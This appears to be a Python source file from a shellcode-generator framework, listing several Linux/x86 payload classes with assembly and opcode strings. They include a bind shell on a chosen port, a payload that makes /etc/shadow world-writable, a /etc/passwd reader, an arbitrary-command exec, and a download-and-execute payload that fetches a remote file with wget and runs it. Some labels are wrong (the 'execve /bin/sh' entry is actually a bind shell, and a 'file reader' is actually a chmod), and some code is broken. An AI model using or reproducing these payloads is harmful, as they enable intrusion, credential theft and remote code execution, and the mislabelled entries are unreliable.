class Payload(Shellcode):
Shellcode.info["author"] = "xmgv"
Shellcode.info["name"] = "Linux/x86 execve /bin/sh shellcode"
Shellcode.info["references"] = [
"https://www.exploit-db.com/exploits/36398/",
"https://xmgv.wordpress.com/2015/02/19/28/",
]
Shellcode.info["size"] = 94 + Shellcode.getsize(kwargs["lport"])
Shellcode.info["rawassembly"] = [
"xor %eax,%eax",
"push %eax",
"push $0x68732f2f",
"push $0x6e69622f",
"mov %esp,%ebx",
"push %eax",
"push %ebx",
"mov %esp,%ecx",
"mov $0xb,%al",
"int $0x80",
]
def __init__(self, **kwargs):
Shellcode.info["payload"] = [
r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53"
r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0"
r"\x66\x43\x52\x66\x68" + kwargs["lport"] +
r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89"
r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89"
r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1"
r"\xcd\x80\x93\x31\xc9\xb1\x02"
r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92"
r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"
]
class Payload(Shellcode):
Shellcode.info["author"] = "B3mB4m"
Shellcode.info["name"] = "Linux/x86 - file reader"
Shellcode.info["references"] = [
"https://www.exploit-db.com/exploits/37285/"
]
Shellcode.info["size"] = 19 + Shellcode.getsize(kwargs["file"])
Shellcode.info["rawassembly"] = [
"xor %eax,%eax",
"push %eax",
"push $0x776f6461",
"push $0x68732f63",
"push $0x74652f2f",
"mov $0xf,%al",
"mov %esp,%ebx",
"mov $0x1ff,%cx",
"int $0x80",
"xor %eax,%eax",
"inc %eax",
"int $0x80",
]
def __init__(self, **kwargs):
Shellcode.info["payload"] = [
r"\x31\xc0\x50" + kwargs["file"] + r"\xb0\x0f\x89\xe3\x66\xb9\xff"
r"\x01\xcd\x80\x31\xc0\x40\xcd\x80"
]
class Payload(Shellcode):
Shellcode.info["author"] = "B3mB4m"
Shellcode.info["name"] = "Linux/x86 - file reader"
Shellcode.info["references"] = [
"https://www.exploit-db.com/exploits/37297/"
]
Shellcode.info["size"] = 43 + Shellcode.getsize(kwargs["file"])
Shellcode.info["rawassembly"] = [
"xor %ecx,%ecx",
"xor %eax,%eax",
"xor %edx,%edx",
"push %ecx",
"mov $0x5,%al",
"push $0x64777373",
"push $0x61702f63",
"push $0x74652f2f",
"mov %esp,%ebx",
"int $0x80",
"mov %ebx,%ecx",
"mov %eax,%ebx",
"mov $0x3,%al",
"mov $0xfff,%dx",
"inc %dx",
"int $0x80",
"xor %eax,%eax",
"xor %ebx,%ebx",
"mov $0x1,%bl",
"mov $0x4,%al",
"int $0x80",
"xor %eax,%eax",
"mov $0x1,%al",
"int $0x80",
]
def __init__(self, **kwargs):
Shellcode.info["payload"] = [
r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" + kwargs["file"] +
r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0"
r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80"
r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd"
r"\x80\x31\xc0\xb0\x01\xcd\x80"
]
class Payload(Shellcode):
Shellcode.info["author"] = "Unkown"
Shellcode.info["name"] = "Linux/x86 - exec shellcode"
Shellcode.info["size"] = 36 + Shellcode.getsize(kwargs["execommand"])
def __init__(self, **kwargs):
db = []
for x in kwargs["execommand"]:
db.append("\\x"+x.encode("hex"))
kwargs["execommand"] = "".join(db)
Shellcode.info["payload"] = [
r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12"
r"\x00\x00\x00"
+kwargs["execommand"]+
r"\x00\x57\x53\x89\xe1\xcd\x80"
]
class Payload(Shellcode): Shellcode.info["author"] = "B3mB4m" Shellcode.info["name"] = "Linux x86 Download & Execute Shellcode" Shellcode.info["references"] = [ "https://www.exploit-db.com/exploits/39389/" ] Shellcode.info["size"] = \ 101 + Shellcode.getsize(kwargs["filename"])*2 + Shellcode.getsize([kwargs["url"]]) Shellcode.info["rawassembly"] = [ "xor eax,eax", "mov al,0x2", "int 0x80", "xor ebx,ebx", "cmp eax,ebx", "jz 0x47", "xor ecx,ecx", "xor ebx,ebx", "xor eax,eax", "push byte +0x5", "mov ecx,esp", "mov ecx,esp", "mov ebx,esp", "mov al,0xa2", "int 0x80", "xor ecx,ecx", "xor eax,eax", "push eax", "mov al,0xf", "push byte +0x68", "mov ebx,esp", "xor ecx,ecx", "mov cx,0x1ff", "int 0x80", "xor eax,eax", "push eax", "push byte +0x68", "mov ebx,esp", "push eax", "mov edx,esp", "push ebx", "mov ecx,esp", "mov al,0xb", "int 0x80", "xor eax,eax", "inc eax", "int 0x80", "push byte +0xb", "pop eax", "cdq", "push edx", "push dword 0x682f6365", "push dword 0x78652f2f", "push dword 0x6f692e62", "push dword 0x75687469", "push dword 0x672e6d34", "push dword 0x626d3362", "mov ecx,esp", "push edx", "push byte +0x74", "push dword 0x6567772f", "push dword 0x6e69622f", "push dword 0x7273752f", "mov ebx,esp", "push edx", "push ecx", "push ebx", "mov ecx,esp", "int 0x80", ] def __init__(self, **kwargs): Shellcode.info["payload"] = [ r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74" r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1" r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31" r"\xc0\x50\xb0\x0f" +kwargs["filename"]+ r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31" r"\xc0\x50" +kwargs["filename"]+ r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd" r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" +kwargs["url"]+ r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68" r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3" r"\x52\x51\x53\x89\xe1\xcd\x80" ]
